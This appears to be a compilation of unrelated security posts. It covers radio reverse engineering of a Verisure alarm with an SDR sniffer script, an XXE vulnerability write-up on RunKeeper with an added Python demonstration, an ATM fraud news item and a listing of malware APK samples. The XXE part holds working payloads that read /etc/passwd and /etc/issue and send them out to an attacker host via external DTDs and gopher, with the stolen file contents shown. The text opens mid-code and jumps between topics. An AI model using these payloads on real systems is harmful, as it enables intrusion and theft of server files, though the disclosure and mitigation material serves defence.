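WELL_FORMED_SIG = b"\x30\x45" + b"\x02\x20" + R_VALUE + b"\x02\x21\x00" + S_VALUE
OVERSIZED_R_SIG = b"\x30\x4d" + b"\x02\x28" + b"\x01" * 40 + b"\x02\x21\x00" + S_VALUE
TRUNCATED_SIG = WELL_FORMED_SIG[:-5]

if __name__ == "__main__":
    for name, sig in [("well-formed", WELL_FORMED_SIG),
                      ("oversized r", OVERSIZED_R_SIG),
                      ("truncated", TRUNCATED_SIG)]:
        print(name, decode_ecdsa_signature(sig, 32))
```

The 40-byte r is the shape of input the post's one-byte mutation fuzzer would eventually produce (a corrupted length byte in the encoding); a decoder that sizes its copy from the INTEGER length without the comparison in _unsigned_integer is the pattern to look for when auditing similar code.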
-
Reverse Engineer a Verisure Wireless Alarm part 1 – Radio Communications
by foip on November 16th, 2014

1. Introduction

Verisure is a supplier of wireless home alarms and connected services for the home. A Verisure setup can be composed of multiple devices, sensors and/or detectors such as motion detectors with camera, magnetic contacts for doors or windows, smoke detectors, keypads, sirens, etc. Each component of the setup communicates wirelessly with the central gateway called "Vbox", itself monitored by Verisure agents through the Internet and/or a 3G connection. As a Verisure customer, I was curious to get a clear view of the design and security measures implemented by the manufacturer. I therefore decided to buy a testing kit on eBay (120 Euros), open it and start an exciting journey inside the boxes. This post is the first part of my Verisure story and aims to observe radio communications between the multiple devices of the alarm. In other words, we will translate the radio communication into binary messages. Please note that Verisure is the new name of Securitas-Direct. You may find both names in my scripts and screenshots.

2. Discovering frequency and modulation

We know that 433 MHz and 868 MHz are popular bands for such equipment. Starting our favorite spectrum analyzer (GQRX in this case) confirmed our thoughts by showing some strong pulses while we were pushing random keys on the alarm keypad, located next to the HackRF.
In order to get a clear view of the signal, samples were recorded using the hackrf_transfer tool and then opened in baudline:

$ hackrf_transfer -s 2000000 -f 869000000 -a 0 -r /tmp/hackrf_verisure_s2000000_f869000000_01.iq
call hackrf_sample_rate_set(2000000 Hz/2.000 MHz)
call hackrf_baseband_filter_bandwidth_set(1750000 Hz/1.750 MHz)
call hackrf_set_freq(869000000 Hz/869.000 MHz)
call hackrf_set_amp_enable(0)
Stop with Ctrl-C
3.9 MiB / 1.000 sec = 3.9 MiB/second
3.9 MiB / 1.000 sec = 3.9 MiB/second
3.9 MiB / 1.000 sec = 3.9 MiB/second
4.2 MiB / 1.000 sec = 4.2 MiB/second
3.9 MiB / 1.000 sec = 3.9 MiB/second
3.9 MiB / 1.000 sec = 3.9 MiB/second
3.9 MiB / 1.000 sec = 3.9 MiB/second
4.2 MiB / 1.000 sec = 4.2 MiB/second
^CCaught signal 2
2.1 MiB / 0.540 sec = 3.9 MiB/second
User cancel, exiting...
Total time: 8.54128 s
hackrf_stop_rx() done
hackrf_close() done
hackrf_exit() done
fclose(fd) done
exit

Nice! Zooming into the signal shows 2 spikes, which means that we are probably in front of a 2-FSK modulated signal.

3. Chipsets and datasheets

Before going further, it could be interesting to learn a bit more about the micro-controller used by the devices. As you will see, this information is really helpful since it gives us some clues about the potential modulation, ciphering, data encoding, etc. Opening a magnetic contact revealed a CC1110-F16 chip. Briefly, the datasheet informs us about the following capabilities of the chip:

- Modulation: 2-FSK, GFSK, MSK, ASK, and OOK
- 128-bit AES supported in hardware coprocessor (so if data looks encrypted, we probably already know which cipher is in use)
- 8051 MCU architecture (needed later for IDA Pro)
- Optional automatic whitening and de-whitening of data
- …

Additionally, we know a magical firmware called RFCat which can definitely help us to learn and play with CC1110 chips.
RFCat will be largely used in the next parts of our Verisure story. For now, we will focus on the GNURadio framework and the HackRF One SDR platform.

4. GNURadio at work

4.1. A first FFT

Let's build a simple GNURadio flowgraph using the HackRF as a source, plus an FFT Sink. To avoid the DC spike in the middle of our signal, we tune the HackRF to 520 kHz below the interesting frequency, and then shift the signal back using the Frequency Xlating FIR Filter block. A few GUI sliders are used to control the gain and to provide additional fine-tuning of the frequency. Great. Our supposed 2-FSK modulated signal is back. The center frequency is about 869.036 MHz.

4.2. Signal filtering and demodulation

It is time to start demodulating the signal, but first we need to remove any unwanted noise or adjacent communications.

4.2.1. Filtering

Using baudline, we have observed about 38.3 kHz between the MARK and SPACE frequencies, so a deviation of about 19 kHz. In our GNURadio flowgraph, we then apply a low-pass filter to our signal using a cutoff value of 21 kHz (so a bit more than 19 kHz) and a transition width of 15 kHz:

firdes.low_pass(1, samp_rate, 21000, 15000)

4.2.2. Demodulation

As we are facing a potential FSK modulated signal, a Quadrature Demod block is added to the flowgraph, which then sends the demodulated signal into a WAV file for further analysis. The new flowgraph becomes: Haaaa, by opening our WAV file in Audacity (or any other WAV file editor), the demodulated signal seems to reveal its secrets: a preamble (0101010101…) and a potential synchronization pattern. Let's go a bit further by slicing the signal into proper 0s and 1s. The Binary Slicer block converts all samples above 0 to 1, and samples below 0 to 0. The block is inserted between the demodulator block and the WAV sink. Back in Audacity, this beautiful binary sequence appears…
4.3. Getting the sync word (Access Code)

Getting the synchronization word is now only a matter of observing the pattern just after the preamble. Audacity helps to do this by adding a Label layer on top of the WAV signal. The difficulty here is to find the right font which matches (more or less) the flow of our signal. We observe a double sync word equal to 0xD391.

4.4. Getting symbol rate and samples per symbol

So far so good. The next step is to discover the symbol rate and the samples per symbol needed to convert this signal into a binary sequence (done by the "Clock Recovery" block).

4.4.1. Symbol rate

What is "Symbol Rate"? By symbol, we mean 0 or 1. Thus the question to answer is "How many 0s or 1s do we observe per second?". I know that better techniques exist to compute this value (I just need to learn them) but right now, I will simply count the number of symbols from the Audacity view: We count about 69 symbols during 0.00180 seconds, which gives a symbol rate of 38333:

$ echo -n "010101010101010101010101011010011100100011101001110010001111100001111" | wc -c
69
$ bc
bc 1.06.95
Copyright 1991-1994, 1997, 1998, 2000, 2004, 2006 Free Software Foundation, Inc.
This is free software with ABSOLUTELY NO WARRANTY.
For details type `warranty'.
69 / 0.00180
38333
quit

As I said, this method is probably not the most accurate. Actually, I found a more precise value by performing the same exercise on a larger portion of the signal (but making screenshots less clear). The final symbol rate is 38450.

4.4.2. Samples per symbol

The number of samples per symbol is one of the most important values needed by the Clock Recovery block. Remember that your SDR device is configured to receive or transmit a signal at a specified sample rate.
The number of samples per symbol is just the number of samples needed to send one symbol (0 or 1), and is simply computed like this:

samples_per_symbol = sample_rate / symbol_rate

We now have everything we need to set up the Clock Recovery block:

4.5. Decoding packets

The remaining steps to get digital messages are to recognize the frames using the sync word (done by the Correlate Access Code block) and to decode them (done by the Packet Decoder block). There are a couple of GNURadio blocks dedicated to decoding/encoding packets, but since we are dealing with CC1110 devices, we had to create specific blocks able to respect the CC1110 packet format. Further information about these blocks can be found in the following blog post: GNU Radio – CC1111 packets encoder/decoder blocks. The final GNURadio flowgraph is: As you can see, the Packet Decoder (CC1111) block receives a python queue as argument (see Target Message Queue). This is where our decoded messages will be sent. This flowgraph will actually not be executed as is. Another python script will manage its execution, pull messages from the python queue, dissect them (as Wireshark would do with a pcap file) and print them on the screen. Here below is the main script.
#!/usr/bin/env python
#=============================================================
# Securitas-Direct (Verisure) RF sniffer
# By Jerome Nokin (http://funoverip.net / @FUNoverip)
#=============================================================
#
# Usage: securitas_rx.py [-k KEY]
#
# optional arguments:
#   -k,--key <KEY>    Optional AES-128 Key (hexadecimal)
#
#=============================================================

import ctypes
import sys
import datetime
import argparse
from grc.verisure_demod import verisure_demod
from threading import Thread
from Crypto.Cipher import AES
from binascii import hexlify, unhexlify
from time import sleep

# Colors
def pink(t):   return '\033[95m' + t + '\033[0m'
def blue(t):   return '\033[94m' + t + '\033[0m'
def yellow(t): return '\033[93m' + t + '\033[0m'
def green(t):  return '\033[92m' + t + '\033[0m'
def red(t):    return '\033[91m' + t + '\033[0m'

# Thread dedicated to GNU Radio flowgraph
class flowgraph_thread(Thread):
    def __init__(self, flowgraph):
        Thread.__init__(self)
        self.setDaemon(1)
        self._flowgraph = flowgraph

    def run(self):
        self._flowgraph.Run()
        #print "FFT Closed/Killed"

# AES decryption (AES-128-CBC, PKCS#7 style padding)
BS = 16
pad = lambda s : s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
unpad = lambda s : s[0:-ord(s[-1])]

def aes_decrypt(ciphertext, iv, key, padding=True):
    cipher = AES.new(key, AES.MODE_CBC, iv)
    plaintext = cipher.decrypt(ciphertext)
    if padding:
        return unpad(plaintext)
    else:
        return plaintext

# Generate timestamp
def get_time():
    current_time = datetime.datetime.now().time()
    return current_time.isoformat()

# Print out frames to stdout
def dump_frame(frame, aes_iv = None, aes_key = None):
    # Dissecting frame: length, unknown byte, sequence number, 4-byte source ID,
    # 4-byte destination ID, then the payload
    pkt_len = hexlify(frame[0:1])
    unkn1 = hexlify(frame[1:2])
    seqnr = hexlify(frame[2:3])
    src_id = "".join(hexlify(n) for n in frame[3:7])
    dst_id = "".join(hexlify(n) for n in frame[7:11])
    data = ""

    # Payload is a multiple of 16 bytes and an AES key was provided? Try to decrypt it
    if (ord(unhexlify(pkt_len))-2-8) % 16 == 0 and aes_iv!=None and aes_key!=None:
        # unkn1 is hexlify() output, so compare against the hex string
        if unkn1 == '04':
            # block is 16b without additional padding
            data = " ".join(hexlify(n) for n in aes_decrypt(frame[11:], aes_iv, aes_key, False))
        else:
            # block is 16b with padding
            data = " ".join(hexlify(n) for n in aes_decrypt(frame[11:], aes_iv, aes_key))
        if len(data) ==0:
            data = "<empty> Wrong AES key ?"
    else:
        data = " ".join(hexlify(n) for n in frame[11:])

    # Print out the frame
    print "[%s] %s %s %s %s %s %s" % (get_time(), yellow(pkt_len), blue(unkn1), seqnr, green(src_id), red(dst_id), pink(data))

# Main entry point
if __name__ == '__main__':
    aes_iv = unhexlify("00000000000000000000000000000000")
    aes_key = None

    if sys.platform.startswith('linux'):
        try:
            x11 = ctypes.cdll.LoadLibrary('libX11.so')
            x11.XInitThreads()
        except:
            print "Warning: failed to XInitThreads()"

    # Read args
    parser = argparse.ArgumentParser()
    parser.add_argument("-k", "--key", help="Optional AES-128 Key (hex)", type=str)
    args = parser.parse_args()

    # Initializing GNU Radio flowgraph
    flowgraph = verisure_demod()

    if args.key:
        print "[%s] AES key provided. Decryption enabled" % get_time()
        aes_key = args.key
        aes_key = ''.join(aes_key.split())
        aes_key = unhexlify(aes_key)
        print "[%s] AES-128 IV : %s" % (get_time(), hexlify(aes_iv))
        print "[%s] AES-128 key: %s" % (get_time(), hexlify(aes_key))

    # current frequency
    freq = 0

    # Some additional output
    print "[%s] Starting flowgraph" % get_time()

    # Start flowgraph inside a new thread
    flowgraph_t = flowgraph_thread(flowgraph)
    flowgraph_t.start()

    # While the flowgraph thread is running (and we hope 'producing')
    while flowgraph_t.isAlive():
        # Did we change frequency ?
        if freq != flowgraph.get_frequency():
            print "[%s] Frequency tuned to: %0.2f KHz" % (get_time(), flowgraph.get_frequency()/1000)
            freq = flowgraph.get_frequency()

        # Emptying message queue
        while True:
            if flowgraph.myqueue.count() <= 0:
                break
            frame = flowgraph.myqueue.delete_head_nowait().to_string()
            dump_frame(frame, aes_iv, aes_key)

        # I can't exit the script because of a blocking call to "myqueue.delete_head()". So for now..
        sleep(0.1)

    print "[%s] Exiting" % (get_time())

# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4

Here is the final output: A few comments about the output. Briefly:

- In yellow: the length of the packet
- In blue: still unclear, but it appears to be related to payload encryption (encrypted or not, has padding or not, …)
- In grey: a kind of sequence number
- In green: the source ID of the packet
- In red: the destination ID of the packet
- In pink: the payload

5. Final note

The reader has probably observed from the output of the script that an AES-128 key is provided and that payloads are decrypted. The way we recovered the key will be discussed later on. Don't try this key at home since keys are randomly generated by the VBox. The GNURadio flowgraph and python script can be downloaded from https://github.com/funoverip/verisure-alarm.

Prerequisites:

- I've used the HackRF One as SDR platform but any other SDR device should do the trick.
- You will need GNURadio 3.7 or above.
- Do not forget to also install the GNURadio gr-cc1111 blocks!

Last but not least, a big thank you to Michael Ossmann for his awesome SDR class. Strongly recommended! Hope you enjoyed this post… Regards.

Source: Reverse Engineer a Verisure Wireless Alarm part 1 – Radio Communications | Fun Over IP
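As an added example (my own code, not the post's script and not the gr-cc1111 blocks), the Python below reproduces the receive chain of the flowgraph in software on a constructed 2-FSK signal: quadrature demodulation, binary slicing, clock recovery at the measured samples-per-symbol, correlation on the doubled 0xD391 sync word, and dissection of the packet along the field boundaries the post identified. The sample rate, symbol rate and deviation are the post's figures; the 0xAA preamble, the frame contents and the assumption that the length byte counts every byte after it are mine.

```python
import cmath
import math

# Figures measured in the post: HackRF capture at 2 Msps, symbol rate 38450 baud,
# FSK deviation of about 19 kHz, and a doubled sync word of 0xD391.
SAMPLE_RATE = 2_000_000
SYMBOL_RATE = 38450
DEVIATION_HZ = 19_000
SPS = SAMPLE_RATE / SYMBOL_RATE            # samples per symbol, about 52.02
ACCESS_CODE = [int(b) for b in format((0xD391 << 16) | 0xD391, "032b")]
PREAMBLE = b"\xaa" * 4                     # 10101010... (assumed preamble for the example)


def bytes_to_bits(data):
    """MSB-first bit list, the order the radio transmits bytes in."""
    return [int(b) for byte in data for b in format(byte, "08b")]


def bits_to_bytes(bits):
    usable = len(bits) - len(bits) % 8
    return bytes(int("".join(str(b) for b in bits[i:i + 8]), 2) for i in range(0, usable, 8))


def fsk_modulate(bits):
    """Constructed 2-FSK baseband: +DEVIATION_HZ for a 1 (mark), -DEVIATION_HZ for a 0 (space)."""
    samples = []
    phase = 0.0
    for i, bit in enumerate(bits):
        freq = DEVIATION_HZ if bit else -DEVIATION_HZ
        count = round((i + 1) * SPS) - round(i * SPS)   # integer sample count averaging to SPS
        for _ in range(count):
            phase += 2 * math.pi * freq / SAMPLE_RATE
            samples.append(cmath.exp(1j * phase))
    return samples


def quadrature_demod(samples):
    """Instantaneous frequency as the phase step between consecutive samples (Quadrature Demod)."""
    return [cmath.phase(samples[n] * samples[n - 1].conjugate()) for n in range(1, len(samples))]


def binary_slice(demod):
    """Binary Slicer: positive frequency -> 1, negative -> 0."""
    return [1 if x > 0 else 0 for x in demod]


def clock_recovery(sliced):
    """Lock onto the first transition, then take one sample per symbol at the symbol centre."""
    first = next((i for i in range(1, len(sliced)) if sliced[i] != sliced[i - 1]), None)
    if first is None:
        return []
    bits = []
    k = 0
    while True:
        idx = int(first + (k + 0.5) * SPS)
        if idx >= len(sliced):
            return bits
        bits.append(sliced[idx])
        k += 1


def correlate_access_code(bits):
    """Return the bits that follow the doubled sync word, or None if it is not present."""
    n = len(ACCESS_CODE)
    for i in range(len(bits) - n + 1):
        if bits[i:i + n] == ACCESS_CODE:
            return bits[i + n:]
    return None


def dissect_frame(payload_bits):
    """Split a decoded packet along the field boundaries the post identified.

    Assumption (matching the post's script): the first byte is the packet length
    counting every byte after it, then the unknown byte, a sequence number, a
    4-byte source ID, a 4-byte destination ID and the (possibly encrypted) payload.
    """
    data = bits_to_bytes(payload_bits)
    if not data or data[0] < 10 or len(data) < 1 + data[0]:
        return None                          # too short to hold the fixed fields
    frame = data[:1 + data[0]]
    return {
        "length": frame[0],
        "unkn1": frame[1:2].hex(),
        "seq": frame[2:3].hex(),
        "src": frame[3:7].hex(),
        "dst": frame[7:11].hex(),
        "payload": frame[11:].hex(),
    }


def decode_capture(samples):
    """Whole receive chain: demod -> slicer -> clock recovery -> sync search -> dissect."""
    bits = clock_recovery(binary_slice(quadrature_demod(samples)))
    after_sync = correlate_access_code(bits)
    return None if after_sync is None else dissect_frame(after_sync)


# Constructed over-the-air frame: length 0x0c, unkn1 0x00, seq 0x01,
# src 11223344, dst aabbccdd, 2-byte payload cafe.
EXAMPLE_FRAME = bytes.fromhex("0c 00 01 11223344 aabbccdd cafe")
EXAMPLE_BITS = bytes_to_bits(PREAMBLE + b"\xd3\x91\xd3\x91" + EXAMPLE_FRAME)

if __name__ == "__main__":
    print(decode_capture(fsk_modulate(EXAMPLE_BITS)))
```

The clock recovery here is the simplest possible (one edge, then free-running at SPS), which is enough for a clean constructed signal; on a real capture the Clock Recovery block's feedback loop is what keeps the sampling point from drifting across a long packet.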
-
Identifying Xml eXternal Entity vulnerability (XXE)

Here is a small writeup on how an XXE was discovered on the website RunKeeper.com. The website, as the name suggests, keeps track of your training sessions (running, cycling, skiing, etc.). The vulnerabilities presented were fixed on June 10th 2014.

The website accepts the upload of GPX files. The GPX file format is an XML document containing a list of positions with the instant speed, time and elevation.

GPX file

Here is an example of a GPS file in the GPX format. The only important aspect is that it is XML based.

    <gpx creator="EliteGPS" version="1.0" xmlns="GPX: the GPS Exchange Format">
      <time>2014-06-07T20:04:44.453Z</time>
      <bounds maxlat="35.461644151" maxlon="-73.562228351" minlat="35.437931663" minlon="-73.610299487">
      <trk>
        <trkseg>
          <trkpt lat="35.460997739" lon="-73.568049331">
            <ele>22.600000</ele>
            <time>2014-06-07T18:06:16Z</time>
            <speed>0.000000</speed>
          </trkpt>
          <trkpt lat="35.460997655" lon="-73.568049163">
            <ele>22.600000</ele>
            <time>2014-06-07T18:06:16Z</time>
            <speed>0.000000</speed>
          </trkpt>
          [...]
        </trkseg></trk>
      </bounds></gpx>

Attack potential

When seeing user XML being parsed server-side, the first thing that should come to mind is XXE attacks. XXE stands for Xml eXternal Entity. These attacks have gained momentum recently following various publications. Note that the current article doesn't explain XXE in depth. It focuses on tips and methodology to identify the vulnerability and the parser capabilities. The tests presented are those that were effective on the old version of RunKeeper.

Step 1 : Confirmation that entities are interpreted

In our first attempt, we need to confirm that entities are interpreted in their most basic form. We replace a value with an inline entity. If it loads properly, then the replacement must have occurred.

    <!DOCTYPE foo [<!ENTITY xxe "35.460997739" > ]>
    <gpx creator="EliteGPS" version="1.0" xmlns="GPX: the GPS Exchange Format">
      <time>2014-06-07T20:04:44.453Z</time>
      <bounds maxlat="35.461644151" maxlon="-73.562228351" minlat="35.437931663" minlon="-73.610299487">
      <trk>
        <trkseg>
          <trkpt lat="&xxe;" lon="-73.568049331">
            <ele>22.600000</ele>
            <time>2014-06-07T18:06:16Z</time>
            <speed>0.000000</speed>
          </trkpt>
        </trkseg></trk>
      </bounds></gpx>

Step 2 : Confirmation that SYSTEM entities are usable

We can now try loading external resources from a host we control. The resources can be hosted on an HTTP server, an FTP server or even Samba shares in the case of an intranet application.

RunKeeper only looks at position, time and other numeric values. The string values from the metadata are not used. Therefore, it is not possible to get a direct response after the upload of a GPX file. If the destination is a server we control, we would receive a connection if external entities are activated. Assuming strict firewall restrictions are in place, all common ports should be tested (23, 80, 443, 8080, ...).

evil.gpx

    <!DOCTYPE foo [<!ENTITY xxe SYSTEM "I'm Feeling Lucky" > ]>
    <gpx creator="EliteGPS" version="1.0" xmlns="GPX: the GPS Exchange Format">
      <desc>&xxe;</desc>
      <time>2014-06-07T20:04:44.453Z</time>
      <bounds maxlat="35.461644151" maxlon="-73.562228351" minlat="35.437931663" minlon="-73.610299487">
      <trk>
        <trkseg>
          <trkpt lat="35.460997739" lon="-73.568049331">
            <ele>22.600000</ele>
            <time>2014-06-07T18:06:16Z</time>
            <speed>0.000000</speed>
          </trkpt>
        </trkseg></trk>
      </bounds>
    </gpx>

Right after the upload, our server receives the following request. SYSTEM entities are now confirmed.

    74.50.53.234 - - [08/Jun/2014:00:36:55 -0400] "GET /ping_me HTTP/1.1" 200 77 "-" "Java/1.6.0_26"

Step 3 : Test for external DTD availability to exfiltrate data

A cool trick was discovered by researchers that allows the construction of a URL with data coming from other entities.

evil1.gpx

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE roottag [
      <!ENTITY % file SYSTEM "file:///etc/issue">
      <!ENTITY % dtd SYSTEM "I'm Feeling Lucky">
    %dtd;]>
    <gpx creator="EliteGPS" version="1.0" xmlns="GPX: the GPS Exchange Format">
      <desc>&send;</desc>
      [....]
    </gpx>

I'm Feeling Lucky

    <?xml version="1.0" encoding="UTF-8"?>
    <!ENTITY % all "<!ENTITY send SYSTEM 'I'm Feeling Lucky'>">
    %all;

Following the upload, we then received the following request:

    74.50.62.56 - - [08/Jun/2014:00:51:41 -0400] "GET /content?Debian GNU/Linux 7 \x5Cn \x5Cl HTTP/1.1" 200 251 "-" "Java/1.6.0_26"

In practice, the previous technique is not perfect. Any file with XML-incompatible characters (&, \n, \x80, etc.) would break the URL. /etc/issue is one of the rare files safe to include.

Step 4 : Test for external DTD with gopher protocol

We still have an option to fetch arbitrary files. A good observer would have noticed that the remote JVM version was captured in step 1. The version is Java 1.6 update 26. The gopher protocol was disabled in version 1.6 update 37 [Ref]. The gopher protocol can be used to open a TCP connection and send arbitrary data.

    gopher://remote_host:remote_port/?ARBITRARY_DATA

evil2.gpx

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE roottag [
      <!ENTITY % file SYSTEM "file:///etc/passwd">
      <!ENTITY % dtd SYSTEM "I'm Feeling Lucky">
    %dtd;]>
    <gpx creator="EliteGPS" version="1.0" xmlns="GPX: the GPS Exchange Format">
      <desc>&send;</desc>
      [....]
    </gpx>

I'm Feeling Lucky

    <?xml version="1.0" encoding="UTF-8"?>
    <!ENTITY % all "<!ENTITY send SYSTEM 'gopher://xxe.me:1337/xxe?%file;'>">
    %all;

Following the upload of the first file, an incoming connection is opened and the file content is received.

    $ nc -nlvk 1337
    Listening on [0.0.0.0] (family 0, port 1337)
    Connection from [74.50.53.234] port 1337 [tcp/*] accepted (family 2, sport 42321)
    xe?root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    [...]

Files can be fetched and directories can be listed. For example, the entity "file:///" will return the root directory:

    $ nc -nlvk 1337
    Listening on [0.0.0.0] (family 0, port 1337)
    Connection from [74.50.58.179] port 1337 [tcp/*] accepted (family 2, sport 52827)
    xe?.rpmdb
    .ssh
    bin
    boot
    dev
    etc
    home
    initrd.img
    lib
    lib32
    lib64
    lost+found
    media
    mnt
    opt
    proc
    root
    sbin
    selinux
    [...]

Demonstration

Demonstration of the attacks described previously.

Mitigations

To resolve this issue, two changes needed to be applied. SYSTEM entities were disabled for the parsing of GPX files. Also, the Java Virtual Machine was updated to benefit from the previous security updates, including the gopher protocol being disabled by default.

References :

- Presentation by Nicolas Grégoire at HackInTheBox 2012
- Presentation by Timothy Morgan at AppSecUSA 2013
- Compromising an unreachable Solr server with CVE-2013-6397: vulnerability found by Nicolas Grégoire
- XML Schema, DTD, and Entity Attacks: excellent reference on the attack variations, written by Timothy D. Morgan (Virtual Security Research)
- Presentation by Alexey Osipov and Timur Yunusov at BlackHat USA 2013
- XXE OOB exploitation at Java 1.7+: alternative method to exfiltrate data without the gopher protocol, presented by Ivan Novikov

Posted by Philippe Arteau at 11:35 AM

Source: h3xStream's blog: Identifying Xml eXternal Entity vulnerability (XXE)
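The identification steps above and the mitigation, as an added example that is not part of the original post. It stands in Python's xml.sax (expat) for the Java parser RunKeeper ran, a constructed one-line temp file for /etc/issue, and a listener on 127.0.0.1 for the attacker's host; the GPX builder, the file and the URLs are hypothetical. It covers step 1 (inline entity), step 2 both in-band (file content lands in <desc>) and blind (only a hit on the listener), and the fix from the Mitigations section (external entities off and the DOCTYPE refused outright). The external-DTD trick of steps 3 and 4, which relies on the target parser expanding a parameter entity inside an entity value literal, is not attempted here.

```python
import http.server
import io
import os
import tempfile
import threading
import xml.sax
from xml.sax import handler

SECRET = "s3cr3t-token"  # constructed stand-in for /etc/issue: one line, no XML metacharacters


class TextCollector(handler.ContentHandler):
    """Keep the character data of every element by tag name; <desc> is the one we watch."""
    def __init__(self):
        super().__init__()
        self.current, self.text = None, {}
    def startElement(self, name, attrs):
        self.current = name
        self.text.setdefault(name, "")
    def characters(self, content):
        if self.current is not None:
            self.text[self.current] += content
    def endElement(self, name):
        self.current = None


class RejectDoctype:
    """Lexical handler: abort at the first DOCTYPE, so no entity can ever be declared."""
    def startDTD(self, name, public_id, system_id):
        raise ValueError("DOCTYPE rejected: " + name)
    def endDTD(self): pass
    def startCDATA(self): pass
    def endCDATA(self): pass
    def comment(self, content): pass


def gpx(desc_markup, internal_subset=""):
    """Minimal GPX upload (hypothetical sample) whose <desc> carries the payload under test."""
    doctype = "<!DOCTYPE gpx [" + internal_subset + "]>" if internal_subset else ""
    return ('<?xml version="1.0"?>' + doctype + '<gpx version="1.0"><desc>' + desc_markup +
            '</desc><trk><trkseg><trkpt lat="35.46" lon="-73.56"/></trkseg></trk></gpx>').encode()


def parse_gpx(xml_bytes, resolve_external=False, reject_doctype=False):
    """xml.sax parse: resolve_external=True models the vulnerable server, reject_doctype the fix."""
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, resolve_external)
    if reject_doctype:
        parser.setProperty(handler.property_lexical_handler, RejectDoctype())
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return collector.text


def write_secret():
    """Write the constructed secret to a temp file and return its file:// URL."""
    path = os.path.join(tempfile.mkdtemp(), "issue")
    with open(path, "w") as fh:
        fh.write(SECRET)
    return "file://" + path


def step1_internal_entity():
    """Step 1: an inline entity is substituted, proving the internal DTD subset is processed."""
    return parse_gpx(gpx("&xxe;", '<!ENTITY xxe "35.460997739">'))["desc"]


def step2_system_entity(resolve_external):
    """Step 2, in-band: a SYSTEM entity pulls a local file into <desc> (empty when disabled)."""
    doc = gpx("&xxe;", '<!ENTITY xxe SYSTEM "%s">' % write_secret())
    return parse_gpx(doc, resolve_external=resolve_external)["desc"]


def step2_callback():
    """Step 2, blind: the only evidence is a hit on a listener we control; returns paths seen."""
    seen = []

    class Listener(http.server.BaseHTTPRequestHandler):
        def do_GET(self):
            seen.append(self.path)
            body = b"ok"  # the reply is parsed as entity text, so keep it well-formed
            self.send_response(200)
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
        def log_message(self, *args):
            pass

    server = http.server.HTTPServer(("127.0.0.1", 0), Listener)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        url = "http://127.0.0.1:%d/ping_me" % server.server_address[1]
        parse_gpx(gpx("&xxe;", '<!ENTITY xxe SYSTEM "%s">' % url), resolve_external=True)
    finally:
        server.shutdown()
        server.server_close()
    return seen


def hardened_rejects(xml_bytes):
    """Mitigation: external entities off and every DOCTYPE refused. True if the upload is rejected."""
    try:
        parse_gpx(xml_bytes, resolve_external=False, reject_doctype=True)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("step 1:", step1_internal_entity(), "| step 2 in-band:", step2_system_entity(True),
          "| step 2 blind:", step2_callback(), "| hardened rejects DOCTYPE:",
          hardened_rejects(gpx("&x;", '<!ENTITY x SYSTEM "file:///etc/issue">')))
```

step2_system_entity(False) shows what the current xml.sax default gives (external general entities have been off since Python 3.7.1): an empty <desc>, with no error to tell the uploader why. hardened_rejects() goes one step further and refuses the DOCTYPE itself, which is the parser-side equivalent of the SYSTEM-entity change described under Mitigations and also closes the door on the parameter-entity variants.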
-
Default ATM passcodes still exploited by crooks

Posted on 14 November 2014.

Once again, ATMs have been "hacked" by individuals taking advantage of default, factory-set passcodes.

This time the passcode hasn't been guessed, or ended up online for everyone to know because it was printed in the ATM's service manual: the individual who, with the help of an accomplice, managed to cash out $400,000 in 18 months was a former employee of the company that operated the kiosk ATMs they targeted.

Tennessee-based Khaled Abdel Fattah had insider knowledge of the code that, when typed in, put the machines into Operator Mode, which allowed him and accomplice Chris Folad to reconfigure the ATM to dispense $20 bills when asked for $1 ones. They would do this, then ask the machine to dispense, for example, $20, and they would get away with $400. After this, they would revert the change so that the theft would go unnoticed.

And it took 18 months for this to happen: the owner of one of the businesses where one of these kiosk ATMs was set up noticed that there was a problem when the machine was running out of money.

What ultimately led the Secret Service to the two fraudsters was the fact that their faces were captured by surveillance cameras and they used their own debit cards to make withdrawals. They also stuck to a rather limited set of ATMs, all located in Nashville.

According to Wired, both men have been charged with 30 counts of computer fraud and conspiracy.

This is not the first time that ATM heists like this have happened. Around 2005, service manuals of ATMs manufactured by Tranax and Trident ended up online, and contained the passcodes that allowed anyone to access their Operator Mode. Street crooks began taking advantage of the fact, but it took over 18 months for the wider public to discover it. This forced the ATM vendors in question to make it mandatory for operators to change this default password when installing the machine.

But unfortunately, there are many ATMs with the old system still out there, and still vulnerable.

Source: Default ATM passcodes still exploited by crooks
-
MALWARE SAMPLES!

Name  Last modified  Size

!getril.apk  14-Nov-2014 15:44  827K
(??????).apk  14-Nov-2014 15:49  186K
(??)_2.4.2.2.apk  14-Nov-2014 15:46  2.3M
)>.apk  14-Nov-2014 15:48  762K
-??-06233.apk  14-Nov-2014 15:44  303K
--¦n¦p¦t-n++¦µ.apk  14-Nov-2014 15:44  11M
-5.6.1.apk  14-Nov-2014 15:45  5.2M
-KonTour_Universe_2.0.apk  14-Nov-2014 15:46  586K
0B5yTJYKn2cFGeHJiaTlNNWJ5elk.apk  14-Nov-2014 15:48  13M
0D28FA54F9C0D41801E8FB5A7B0433DD.apk  14-Nov-2014 15:45  225K
0aafeba54231814518593b6ef588a54c.apk  14-Nov-2014 15:46  1.0M
0b6aa20c09b7e1b6c14154fd5c667276.apk  14-Nov-2014 15:44  954K
0b20e606c327915f82e2744d3b33ff70.apk  14-Nov-2014 15:48  6.3M
0b43ce26e3d71472de357ab4b1e3aa0b94d9f445.apk  14-Nov-2014 15:49  772K
